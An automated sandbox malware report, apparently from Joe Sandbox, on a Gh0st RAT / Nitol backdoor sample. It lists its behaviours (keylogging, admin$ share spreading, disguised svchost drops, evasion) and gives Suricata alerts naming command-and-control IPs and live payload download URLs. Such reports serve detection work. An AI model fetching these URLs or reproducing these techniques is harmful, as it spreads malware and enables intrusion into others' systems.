Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Sample name:	G3izWAY3Fa.exe renamed because original name is a hash value
Original sample name:	118F7F61B6AFB1DA5E94EA1740222C73.exe
Analysis ID:	1579781
MD5:	118f7f61b6afb1da5e94ea1740222c73
SHA1:	5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256:	aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Tags:	exeGh0stRATuser-abuse_ch
Infos:

Detection

GhostRat, Nitol

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected GhostRat

Yara detected Nitol

AI detected suspicious sample

Checks if browser processes are running

Contain functionality to detect virtual machines

Contains functionality to capture and log keystrokes

Contains functionality to detect sleep reduction / modifications

Contains functionality to detect virtual machines (IN, VMware)

Contains functionality to enumerate network shares of other devices

Deletes itself after installation

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Machine Learning detection for dropped file

Sigma detected: Files With System Process Name In Unsuspected Locations

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to communicate with device drivers

Contains functionality to delete services

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries keyboard layouts

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Desusertion Ports

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: G3izWAY3Fa.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\034031\svchost.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\server.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\v5.exe	Avira: detection malicious, Label: TR/Staser.apzjs
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Avira: detection malicious, Label: BDS/Zegost.birna

Multi AV Scanner detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\server.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\v5.exe	ReversingLabs: Detection: 100%
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: G3izWAY3Fa.exe	Virustotal: Detection: 70%			Perma Link
Source: G3izWAY3Fa.exe	ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp	Joe Sandbox ML: detected
Source: C:\Windows\Temp\server.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\v5.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Joe Sandbox ML: detected

Uses 32bit PE files

Source: G3izWAY3Fa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Spreading

Contains functionality to enumerate network shares of other devices

Source: C:\Windows\Temp\v5.exe

Code function: 4_2_00402AD0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,lstrcmp,sprintf,sprintf,sprintf,WNetAddConnection2A,Sleep,memset,sprintf,CopyFileA,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep, \\%s\admin$\g1fd.exe

4_2_00402AD0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405CD8 FindFirstFileA,FindClose,	0_2_00405CD8
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	3_2_10001A20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	3_2_100014B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	3_2_10008B50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	3_2_10008520
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,	3_2_10008E40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_100086F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	3_2_10008F00
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,	5_2_0045B051
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,	5_2_00405260
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,	5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,	8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	8_2_10008F00

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,

3_2_1000AA30

Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic	Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic	Suricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic	Suricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49814 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49814 -> 120.48.34.233:8080

Contains functionality to download and execute PE files

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000B6F0 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep,

3_2_1000B6F0

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.9:49707 -> 120.48.34.233:8000
Source: global traffic	TCP traffic: 192.168.2.9:49720 -> 8.7.198.46:8090
Source: global traffic	TCP traffic: 192.168.2.9:49865 -> 46.82.174.69:8090

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN CHINANET-BACKBONENo31Jin-rongStreetCN
Source: Joe Sandbox View	ASN Name: SPRINGSUS SPRINGSUS
Source: Joe Sandbox View	ASN Name: DTAGInternetserviceprovideroperationsDE DTAGInternetserviceprovideroperationsDE

Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_004036C6 select,__WSAFDIsSet,recv,

2_2_004036C6

Source: global traffic	DNS traffic detected: DNS query: chinagov.8800.org
Source: global traffic	DNS traffic detected: DNS query: www.wk1888.com
Source: global traffic	DNS traffic detected: DNS query: www.af0575.com
Source: global traffic	DNS traffic detected: DNS query: www.fz0575.com

Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1
Source: v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/
Source: v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/1
Source: v5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/VZ
Source: v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/b6
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/h
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/4
Source: v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/6to4
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/_
Source: v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/~
Source: G3izWAY3Fa.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: G3izWAY3Fa.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe8
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exeb
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exee
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exee3
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exejlt
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.af0575.com:2011/1.exe~l
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fz0575.com:2011/1.exe
